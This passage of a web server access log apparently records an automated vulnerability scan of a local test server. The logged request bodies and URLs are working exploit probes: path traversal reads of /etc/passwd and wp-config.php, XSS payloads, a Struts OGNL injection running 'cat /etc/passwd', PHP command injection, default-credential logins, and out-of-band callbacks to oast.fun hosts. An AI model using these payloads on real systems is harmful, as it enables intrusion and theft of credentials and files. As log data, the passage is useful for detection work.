+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://c9v8h88smpv8c1ig07h0aapb3kzhy1mb1.oast.fun/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://c9v8h88smpv8c1ig07h0guita4j66q8r4.oast.fun/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://c9v8h88smpv8c1ig07h06menm45brgbkh.oast.fun\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.215","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A297MTu4X5qcTKKwmmCuwCTgrLbK\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@297MTu4X5qcTKKwmmCuwCTgrLbK.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /loginLess/../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.049","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 